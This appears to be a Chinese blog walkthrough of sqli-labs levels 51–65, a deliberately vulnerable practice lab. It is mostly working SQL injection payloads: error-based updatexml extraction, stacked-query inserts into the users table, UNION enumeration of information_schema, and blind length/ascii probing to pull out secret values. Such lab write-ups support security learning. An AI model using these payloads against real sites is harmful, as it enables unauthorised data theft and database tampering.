当前位置: 首页 > web >正文

sqli-libs通关教程(51-65)

web 2025/8/16 1:49:34

第五十一关

同上关,单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。

?sort=1' and updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1)),1)--+

?sort=-1';insert into users(id,username,password) values ('51','abcd','0000')--+

第五十二关

没有报错显示,只能堆叠注入或者延时注入。

?sort=-1;insert into users(id,username,password) values ('52',(select database()),'111111')

执行后,输入=1

第五十三关

同上关,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入

?sort=-1';insert into users(id,username,password) values ('53',(select database()),'222222') --+

第五十四关

只有十次输入机会,超过十次所有表名,列名,等等都会随机重置

?id=1' and 1=1 --+

?id=1' order by 3 --+

当前数据库和用户名
?id=0' union select 1,user(),database() --+

当前数据库下的所有表
?id=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

这里的表每一次都是随机给出的

字段
?id=0' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='t9ohflf2rg' --+

#字段也是随机/secret_S7T1/

#爆数据       需要获取secret_ZHKC

?id=0' union select 1,database(),group_concat(0x7e,sessid,0x7e,secret_ZHKC) from t9ohflf2rg --+

第五十五关

同上关,闭合为)

判断字段数
?id=1) order by 3 --+

数据库
?id=0) union select 1,2,database() --+


?id=0) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

表每一次都是随机给出的ozuel2vkje

字段
?id=0) union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='ozuel2vkje' --+

字段也是随机

#爆数据,取secret_AEGF段为过关数据
?id=0) union select 1,database(),group_concat(0x7e,sessid,0x7e,secret_AEGF) from ozuel2vkje --+

第五十六关

同上,闭合变为')

联合查询注入

字符型注入
?id=1') and 1=1 --+
?id=1') order by 3 --+

数据库
?id=0') union select 1,2,database() --+

爆表
?id=0') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

字段
?id=0') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='表字段' --+

数据
?id=0') union select 1,database(),group_concat(0x7e,sessid,0x7e,数据名) from 表字段 --+

第五十七关

字符型注入:
?id=1" and 1=1 --+

字段数
?id=1" order by 3 --+

数据库
?id=0" union select 1,2,database() --+


?id=0" union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

字段
?id=0" union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='表' --+

数据
?id=0" union select 1,database(),group_concat(0x7e,sessid,0x7e,字段) from 表 --+

第五十八关

5次机会,库名不变,依旧是challenges

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') ),1)--+

#获取字段:
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from Information_schema.columns where table_name='v15xb374dm' )),1)--+

 #获取字段的值:
?id=1' and updatexml(1,concat(1,(select group_concat(secret_EM8E) from challenges.v15xb374dm )),1)--+

第五十九关

数字型,同上关

表名:

?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') ),1)--+

字段:
?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from Information_schema.columns where table_name='表名' )),1)--+

字段的值:
?id=1 and updatexml(1,concat(1,(select group_concat(字段) from challenges.表名 )),1)--+

第六十关

同上关,闭合为 ?id=1") 

第六十一关

同上关,闭合为 ?id=1'))

第六十二关

盲注

数据库长
?id=1') and length(database())>9    正确 
?id=1') and length(database())>10   错误 
?id=1') and length(database())=10   正确 

ascii码,尝试每一位字符

?id=1') and ascii(mid(database(),1,1))=99 #

第一个表的长度

?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 #

第一个表的字符

?id=1') and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=78 #

得到表名

第一个字段名的长度:

?id=1') and length((select column_name from information_schema.columns where table_name='表名' limit 0,1))=2 #


第一个字段名的每一个字符:

?id=1') and ascii(mid((select column_name from information_schema.columns where table_name='N18FOKJDNC' limit 0,1),1,1))=105 #

得出id

然后依次爆得第二、三、四个字段名分别为: sessid,secret_BDFP, tryy

secret_BDFP字段值的长度:

?id=1') and (select length(secret_BDFP) from N18FOKJDNC)=24 #

每一个值:

?id=1') and ascii(mid((select secret_BDFP from N18FOKJDNC),1,1))=113 #

得出值

第六十三关

同六十二,闭合变为 '       ?id=1'

第六十四关

同六十二,数字型       ?id=1

第六十五关

同六十二,闭合变为 "       ?id=1"

http://www.xdnf.cn/news/17812.html

相关文章:

  • Linux系统编程Day13 -- 程序地址空间(进阶)
  • 18.9 BERT问答模型实战:从数据到部署的完整指南
  • dolphinscheduler 依赖节点不通过
  • 【Spring Boot 3.0 + JDK 17 新手指南:完整用户管理系统】
  • ADB 无线调试连接(Windows + WSL 环境)
  • AI一周事件(2025年8月6日-8月12日)
  • 字符串匹配算法
  • 深度学习——03 神经网络(3)-网络优化方法
  • cisco无线WLC flexconnect配置
  • latex中“itemize”
  • 了解 Linux 中的 /usr 目录以及 bin、sbin 和 lib 的演变
  • 肖臻《区块链技术与应用》第十一讲:比特币核心概念重温:一文读懂私钥、交易、挖矿与网络现状
  • 深入解析 AUTOSAR:汽车软件开发的革命性架构
  • Qt中定时器介绍和使用
  • 什么是跨域访问问题,如何解决?
  • 企业高性能web服务器(3)
  • cartographer 后端优化流程
  • 终端安全检测与防御技术
  • MySQL 存储过程终止执行的方法
  • [TryHackMe]Internal(hydra爆破+WordPress主题修改getshell+Chisel内网穿透)
  • MyBatis 缓存与 Spring 事务相关笔记
  • 安路Anlogic FPGA下载器的驱动安装与测试教程
  • 扩展 Chat2File-deepseek V4.0 正式发布:不仅是更新,更是一次“重塑”
  • 实验-vlan实验
  • 8月12号打卡
  • 常用Linux指令:Java/MySQL/Tomcat/Redis/Nginx运维指南
  • MySql——B树和B+树区别(innoDB引擎为什么把B+树作为默认的数据结构)
  • 什么是 DispatcherServlet?
  • GIT使用攻略
  • HTTP 协议详解:深入理解 Header 与 Body!